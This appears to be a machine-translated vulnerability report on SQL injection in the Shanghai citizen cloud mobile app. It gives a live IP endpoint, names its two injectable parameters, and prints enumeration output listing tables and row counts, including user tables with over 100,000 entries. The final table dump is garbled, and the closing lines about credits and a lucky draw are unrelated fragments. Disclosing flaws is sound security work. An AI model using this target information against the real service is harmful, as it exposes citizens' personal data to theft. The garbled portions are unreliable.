Shanghai citizen cloud app SQL Injection
SQL Injection at a certain place in the Shanghai citizen cloud APP.
Open the APP and a link is found during packet capture
http://218.78.214.24:8080/live/service/top/hasNewOrgan?code=310112110&username=eshimin34188390
Both the code and username parameters are injected.
Database: live+------------------+---------+| Table | Entries |+------------------+---------+| society_user | 42489 || commercial | 6012 || notice | 2216 || temp_com | 1620 || services_discuss | 437 || organ | 214 || society | 214 || dic_service | 31 |+------------------+---------+
Database: live_online+---------------------+---------+| Table | Entries |+---------------------+---------+| organ_type_remind | 1139597 || organ_masg_remind | 414863 || society_user | 133187 || affairsorganelation | 39777 || notice | 12991 || commercial | 7438 || favorite | 3027 || temp_com | 1620 || affairsarchives | 1273 || services_discuss | 850 || affairsorder | 511 || affairsdefine | 280 || society | 252 || organ | 217 || enumeration | 88 || recommend_service | 75 || commercial_set_top | 42 || dic_service | 39 || geo | 19 || vacation | 12 || subject | 9 || affair_type | 8 || recommend_affair | 7 |+---------------------+---------+
Database: live_offline + tables + --------- + | Table | Entries | + tables + --------- + | society_user | 42397 | affairsorganelation | 41211 | commercial | 6011 | notice | 1901 | temp_com | 1620 | affairsarchives | 1189 | services_discuss | 438 | favorite | 411 | affairsdefine | 259 | society | 249 | organ | 217 | enumeration | 86 | dic_service | 31 | geo | 19 | aff Airsorder | 16 | affair_type | 8 | recommend_affair | 4 | subject | 4 | + --------------------- + --------- + another design defect. You can click here to obtain questions and credits.
Bytes.
There was an activity in the past. You can use 10 points for a lucky draw.